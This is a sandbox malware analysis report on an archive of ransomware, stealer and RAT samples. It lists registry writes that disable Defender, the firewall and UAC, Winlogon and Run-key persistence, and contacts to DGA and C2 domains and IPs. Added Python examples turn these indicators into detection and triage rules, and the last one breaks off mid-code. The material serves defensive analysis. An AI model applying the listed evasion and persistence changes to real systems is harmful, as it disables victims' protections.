Malware Analysis Report

2025-01-18 20:48

Sample ID 241122-dyw1qszkhp
Target Batch_7.zip
SHA256 17b4d01d32c64a62e36496829da323fe308437048ca87143de7365fabd4194fd
Tags
discovery evasion persistence trojan upx defense_evasion ransomware spyware stealer xorist pony collection credential_access execution rat impact warzonerat infostealer crypvault
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK: Enterprise Matrix V15

Analysis: static1 (Detonation Overview, Signatures)

Behavioral analyses, in page order, each with Detonation Overview, Command Line, Signatures, Processes, Network and Files: behavioral3, behavioral10, behavioral16, behavioral19, behavioral20, behavioral23, behavioral7, behavioral8, behavioral15, behavioral30, behavioral32, behavioral6, behavioral14, behavioral21, behavioral22, behavioral25, behavioral27, behavioral28, behavioral1, behavioral9, behavioral26, behavioral29, behavioral18, behavioral31, behavioral2, behavioral4, behavioral5, behavioral12, behavioral17, behavioral24, behavioral11, behavioral13

Analysis Overview

score
10/10

SHA256

17b4d01d32c64a62e36496829da323fe308437048ca87143de7365fabd4194fd

Threat Level: Known bad

The file Batch_7.zip was found to be: Known bad.

Malicious Activity Summary

discovery evasion persistence trojan upx defense_evasion ransomware spyware stealer xorist pony collection credential_access execution rat impact warzonerat infostealer crypvault

WarzoneRat, AveMaria

CrypVault

Pony, Fareit

Detected Xorist Ransomware

Modifies security service

Process spawned unexpected child process

Windows security bypass

Crypvault family

Pony family

Xorist family

Modifies firewall policy service

Xorist Ransomware

Modifies WinLogon for persistence

UAC bypass

Warzonerat family

Renames multiple (4027) files with added filename extension

Deletes shadow copies

Renames multiple (2558) files with added filename extension

Warzone RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Blocklisted process makes network request

Windows security modification

Checks computer location settings

Unsecured Credentials: Credentials In Files

Deletes itself

Drops startup file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Indicator Removal: File Deletion

Accesses Microsoft Outlook accounts

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Enumerates connected drives

Requests dangerous framework permissions

Checks whether UAC is enabled

Adds Run key to start application

UPX packed file

Suspicious use of SetThreadContext

Enumerates processes with tasklist

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Command and Scripting Interpreter: JavaScript

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Uses Volume Shadow Copy service COM API

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Interacts with shadow copies

Suspicious use of SendNotifyMessage

Views/modifies file attributes

System policy modification

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

outlook_win_path

Suspicious behavior: RenamesItself

Suspicious use of UnmapMainImage

Kills process with taskkill

Modifies Internet Explorer Phishing Filter

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-22 03:25

Signatures

Requests dangerous framework permissions

Description | Indicator | Process | Target
Allows read only access to phone state, including the current cellular network information, the status of any ongoing calls, and a list of any PhoneAccounts registered on the device. | android.permission.READ_PHONE_STATE | N/A | N/A
Allows access to the list of accounts in the Accounts Service. | android.permission.GET_ACCOUNTS | N/A | N/A
Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A
Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A
Allows an app to create windows using the type LayoutParams.TYPE_APPLICATION_OVERLAY, shown on top of all other apps. | android.permission.SYSTEM_ALERT_WINDOW | N/A | N/A
Required to be able to access the camera device. | android.permission.CAMERA | N/A | N/A
Allows an application to read the user's contacts data. | android.permission.READ_CONTACTS | N/A | N/A
Allows an application to read or write the system settings. | android.permission.WRITE_SETTINGS | N/A | N/A
Allows an application to read the user's contacts data. | android.permission.READ_CONTACTS | N/A | N/A
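
The permissions listed above are what static analysis reads out of an Android app manifest inside the archive. The following added example is the editor's code, not part of the sandbox report: it extracts the same list from a decoded AndroidManifest.xml, groups the names by protection level, and checks the one thing the table above does not show, namely whether the app targets an SDK level below 23, in which case every dangerous permission is granted at install time without a runtime prompt. The manifest, the package name and the protection-level table are constructed for the example; an APK carries its manifest as binary XML, so it has to be decoded (for instance with apktool) before this parser can read it.

```python
"""Classify the permissions declared in a decoded AndroidManifest.xml.

Added example; not code from the sandbox report. It assumes the manifest has
already been decoded to plain XML (for instance with apktool), because the
copy inside an APK is binary XML that xml.etree cannot read directly.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Protection levels as documented for AOSP (editor's own table, not from the
# report). "dangerous" permissions need a runtime prompt on API 23 and later;
# "appop" ones are granted through a special-access settings screen instead.
PROTECTION = {
    "android.permission.READ_PHONE_STATE": "dangerous",
    "android.permission.GET_ACCOUNTS": "dangerous",
    "android.permission.WRITE_EXTERNAL_STORAGE": "dangerous",
    "android.permission.READ_EXTERNAL_STORAGE": "dangerous",
    "android.permission.CAMERA": "dangerous",
    "android.permission.READ_CONTACTS": "dangerous",
    "android.permission.SYSTEM_ALERT_WINDOW": "appop",
    "android.permission.WRITE_SETTINGS": "appop",
}

# Constructed manifest: the permissions from the static1 table, one of them
# declared twice (as in the report), plus a normal one and a low targetSdk.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sample">
  <uses-sdk android:minSdkVersion="16" android:targetSdkVersion="22"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="sample"/>
</manifest>
"""


def declared_permissions(manifest_xml):
    """Return the distinct <uses-permission> names in declaration order."""
    root = ET.fromstring(manifest_xml)
    names = []
    for element in root.iter("uses-permission"):
        name = element.get(ANDROID_NS + "name")
        if name and name not in names:
            names.append(name)
    return names


def target_sdk(manifest_xml):
    """Return android:targetSdkVersion from <uses-sdk>, or None if absent."""
    sdk = ET.fromstring(manifest_xml).find("uses-sdk")
    if sdk is None:
        return None
    value = sdk.get(ANDROID_NS + "targetSdkVersion")
    return int(value) if value else None


def assess(manifest_xml):
    """Group permissions by protection level and say whether prompts apply."""
    perms = declared_permissions(manifest_xml)
    sdk = target_sdk(manifest_xml)
    return {
        "dangerous": [p for p in perms if PROTECTION.get(p) == "dangerous"],
        "special_access": [p for p in perms if PROTECTION.get(p) == "appop"],
        "other": [p for p in perms if p not in PROTECTION],
        "target_sdk": sdk,
        # Apps targeting API 22 or lower get every declared dangerous
        # permission at install time; the user never sees a runtime prompt.
        "install_time_grant": sdk is not None and sdk < 23,
    }


if __name__ == "__main__":
    for key, value in assess(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

The targetSdkVersion check is the part worth keeping: a permission list on its own says what the app could do, while a target below 23 says the user was never asked.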

UPX packed file

upx
Description | Indicator | Process | Target
2 matches (all columns N/A)

Unsigned PE

Description | Indicator | Process | Target
26 matches (all columns N/A)

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:09

Platform

win7-20240903-en

Max time kernel

570s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dumped_.exe"

Signatures

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Dumped_.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Dumped_.exe

"C:\Users\Admin\AppData\Local\Temp\Dumped_.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dolores.cursopersona.com udp

Files

memory/3028-0-0x0000000000AC0000-0x0000000000AD2000-memory.dmp

memory/3028-4-0x0000000000AC0000-0x0000000000AD2000-memory.dmp

C:\ProgramData\hgybrtlyzvfoikl

MD5 241ce528d53d871b6d1acc37205c2eae
SHA1 095f4255e244bdc9289483e901c4ecd3f348f1be
SHA256 dbdd37ac8cf3d6eac875133b03690ca4fe030248a4732d3e95dac906fd42e29c
SHA512 6ec601a12efe4ea214d8413f5e4c64b33e2d7f27acdb596303391a3f5ca6d468576e9c6400fe852601c7612e26f205443b7e9d277d69517e1ed668ec8d738f0a

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20241023-en

Max time kernel

600s

Max time network

581s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "userinit.exe,,C:\\Program Files (x86)\\Mozilla Maintenance Service\\BMNNWfaO.exe" | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,,C:\\Program Files (x86)\\Mozilla Maintenance Service\\BMNNWfaO.exe" | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A

Modifies firewall policy service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A

Windows security bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A

Disables Task Manager via registry modification

evasion

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LNHcdsKW.exe | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LNHcdsKW.exe | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LNHcdsKW.exe | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LNHcdsKW.exe | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe | N/A

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\TUEiLXib = "C:\\Users\\Admin\\AppData\\Local\\Google\\HIvlukUD.exe" | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\TUEiLXib = "C:\\Users\\Admin\\AppData\\Local\\Google\\HIvlukUD.exe" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirtyDecrypt = "\"C:\\Users\\Admin\\AppData\\Roaming\\Dirty\\DirtyDecrypt.exe\" /hide" | C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe | N/A

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
4 matches (all columns N/A)

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Mozilla Maintenance Service\BMNNWfaO.exe | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\BMNNWfaO.exe | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
File created | C:\Program Files (x86)\Dirty\DirtyDecrypt.exe | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
File opened for modification | C:\Program Files (x86)\Dirty\DirtyDecrypt.exe | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
64 events, all with process C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe (description, indicator and target N/A)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe | N/A
Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe | N/A

System policy modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe | N/A
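
The registry writes in the signature tables above are the most reusable part of this analysis: each one is a value that can be checked on any host suspected of running the same sample. The following added example is the editor's code, not the sandbox's. It parses the report's "Set value" rows (description, indicator, process and target columns, either space separated as the report prints them or separated by " | "), normalises the kernel-style key paths (hive prefix, user SID, Wow6432Node, ControlSet001) so that rules match regardless of which user or registry view was written, and maps each write to what it does and to the ATT&CK Enterprise technique it corresponds to. The rule table, the technique mapping and the "expected" clean values are the editor's reading of what each key controls, not something the report states; the sample rows are copied from the behavioral10 tables.

```python
"""Turn the report's "Set value" registry indicators into audit findings.

Added example; not the sandbox's own code. The rule table is the editor's
reading of what each key controls, with ATT&CK Enterprise technique IDs;
the sample rows are copied from the behavioral10 signature tables.
"""
import re
from collections import Counter

ROW = re.compile(r'^Set value \((str|int)\) (.+?) = "(.*)" (.+?) N/A$')
USER_HIVE = re.compile(r'^\\REGISTRY\\USER\\S-1-5-21-[\d-]+\\', re.I)

# Copied from the report (one row per distinct key).
SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,,C:\\Program Files (x86)\\Mozilla Maintenance Service\\BMNNWfaO.exe" C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\TUEiLXib = "C:\\Users\\Admin\\AppData\\Local\\Google\\HIvlukUD.exe" C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirtyDecrypt = "\"C:\\Users\\Admin\\AppData\\Roaming\\Dirty\\DirtyDecrypt.exe\" /hide" C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe N/A',
]


def unescape(value):
    """Undo the report's backslash escaping inside quoted values."""
    return value.replace('\\"', '"').replace('\\\\', '\\')


def normalize_key(raw):
    """Kernel path -> hive-relative key, independent of SID and WOW64 view."""
    key = raw
    if key.upper().startswith('\\REGISTRY\\MACHINE\\'):
        key = 'HKLM\\' + key[len('\\REGISTRY\\MACHINE\\'):]
    else:
        key = USER_HIVE.sub('HKU\\\\<SID>\\\\', key)
    key = key.replace('\\Wow6432Node', '')
    return key.replace('\\ControlSet001\\', '\\CurrentControlSet\\')


def userinit_hijacked(value):
    # The default is "C:\Windows\system32\userinit.exe," with nothing after the comma.
    return any(extra.strip() for extra in value.split(',')[1:])


# (key pattern, hit test on the written value, technique, meaning, clean value)
# Editor's rule table; technique IDs are from the ATT&CK Enterprise matrix.
RULES = [
    (r'\\Winlogon\\Userinit$', userinit_hijacked, 'T1547.004',
     'extra executable launched by Winlogon at every logon', 'C:\\Windows\\system32\\userinit.exe,'),
    (r'\\services\\(wscsvc|WinDefend|wuauserv|MpsSvc)\\Start$', lambda v: v == '4', 'T1562.001',
     'security service set to SERVICE_DISABLED', 'not 4'),
    (r'FirewallPolicy\\\w+Profile\\EnableFirewall$', lambda v: v == '0', 'T1562.004',
     'Windows Firewall profile turned off', '1'),
    (r'FirewallPolicy\\\w+Profile\\DisableNotifications$', lambda v: v == '1', 'T1562.004',
     'firewall block notifications suppressed', '0'),
    (r'\\Policies\\System\\EnableLUA$', lambda v: v == '0', 'T1548.002',
     'UAC disabled (takes effect at next reboot)', '1'),
    (r'\\Security Center\\\w+(DisableNotify|Override)$', lambda v: v == '1', 'T1562.001',
     'Security Center alert suppressed', '0'),
    (r'\\CurrentVersion\\Run\\[^\\]+$', lambda v: True, 'T1547.001',
     'autorun entry; verify the target binary', 'absent'),
]


def parse_rows(rows):
    """Parse report rows; accepts the space separated or ' | ' separated layout."""
    parsed = []
    for line in rows:
        match = ROW.match(line.strip().replace(' | ', ' '))
        if match:
            kind, key, value, process = match.groups()
            parsed.append({'kind': kind, 'key': normalize_key(key),
                           'value': unescape(value), 'process': process})
    return parsed


def triage(rows):
    """Attach the first matching rule to each parsed registry write."""
    findings = []
    for row in parse_rows(rows):
        for pattern, is_hit, technique, meaning, clean in RULES:
            if re.search(pattern, row['key'], re.I) and is_hit(row['value']):
                findings.append({**row, 'technique': technique,
                                 'meaning': meaning, 'expected': clean})
                break
    return findings


def by_process(findings):
    """Count findings per writing process (file name only)."""
    return Counter(f['process'].rsplit('\\', 1)[-1] for f in findings)


if __name__ == '__main__':
    for f in triage(SAMPLE_ROWS):
        print(f"{f['technique']}  {f['key']} = {f['value']!r}  [{f['meaning']}; expected {f['expected']}]")
    print(by_process(triage(SAMPLE_ROWS)))
```

Grouping by writing process shows the division of labour that the tables spread across several headings: the dropped hvuZmoyf.exe does the defence evasion (services, firewall, UAC, Security Center), while dircrypt.deobf.exe plants the Winlogon and Run persistence.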

Processes

C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe

"C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe"

C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe

"C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe"

C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe

"C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe"
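
The Network table below is dominated by DNS queries for pseudo-random .com names, most of which are never followed by a connection, while a handful resolve and receive HTTP connections to 169.50.13.61 and 178.162.203.x. That pattern is what a domain generation algorithm looks like from the outside, and the useful output of the table is the short list of names that actually resolved. The following added example is the editor's code, not the sandbox's: it parses rows in the table's format (country, destination, domain, protocol), separates names that were only queried from names that were actually contacted, and applies a cheap lexical heuristic alongside the behavioural one. The lexical thresholds and the burst rule are the editor's assumptions; the sample rows are the first thirty rows of the table.

```python
"""Separate DGA-style lookups from live C2 endpoints in a sandbox network table.

Added example; not the sandbox's own code. SAMPLE_ROWS are the first thirty
rows of the behavioral10 Network table (country, destination, domain, proto);
the lexical thresholds and the burst rule are the editor's heuristics.
"""
import re

ROW = re.compile(r'^(\w{2}) ([\d.]+):(\d+) (\S+) (udp|tcp)$')
VOWELS = set("aeiou")

SAMPLE_ROWS = """\
US 8.8.8.8:53 viweabkkfe.com udp
DE 178.162.203.202:80 viweabkkfe.com tcp
DE 178.162.203.202:80 viweabkkfe.com tcp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 sjytgtnkdl.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
DE 169.50.13.61:80 sjytgtnkdl.com tcp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
US 8.8.8.8:53 vjuxtixi.com udp
US 8.8.8.8:53 ntrshvquunyzxevkucs.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
DE 169.50.13.61:80 ntrshvquunyzxevkucs.com tcp
DE 169.50.13.61:80 ntrshvquunyzxevkucs.com tcp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
US 8.8.8.8:53 okenhqzgxngnkbwouvfm.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 okenhqzgxngnkbwouvfm.com tcp
""".splitlines()


def lexical_features(label):
    """Vowel ratio, longest consonant run and length of one DNS label."""
    letters = [c for c in label.lower() if c.isalpha()]
    vowels = sum(c in VOWELS for c in letters)
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return {"vowel_ratio": round(vowels / max(len(letters), 1), 2),
            "max_consonant_run": longest, "length": len(label)}


def looks_generated(label):
    """Cheap lexical test; it knowingly misses short, pronounceable output."""
    f = lexical_features(label)
    return f["max_consonant_run"] >= 4 or f["vowel_ratio"] < 0.3 or f["length"] >= 14


def parse_rows(rows):
    """Per-domain counts of DNS queries and of connections to anything else."""
    stats = {}
    for line in rows:
        m = ROW.match(line.strip().replace(" | ", " "))
        if not m:
            continue
        _country, ip, port, domain, proto = m.groups()
        s = stats.setdefault(domain, {"queries": 0, "connections": 0, "endpoints": set()})
        if proto == "udp" and port == "53":
            s["queries"] += 1
        else:
            s["connections"] += 1
            s["endpoints"].add(f"{ip}:{port}")
    return stats


def triage(rows, min_domains=10, min_unresolved_ratio=0.7):
    """Verdict on the whole table plus the names that were really contacted."""
    stats = parse_rows(rows)
    domains = list(stats)
    unresolved = [d for d in domains if stats[d]["connections"] == 0]
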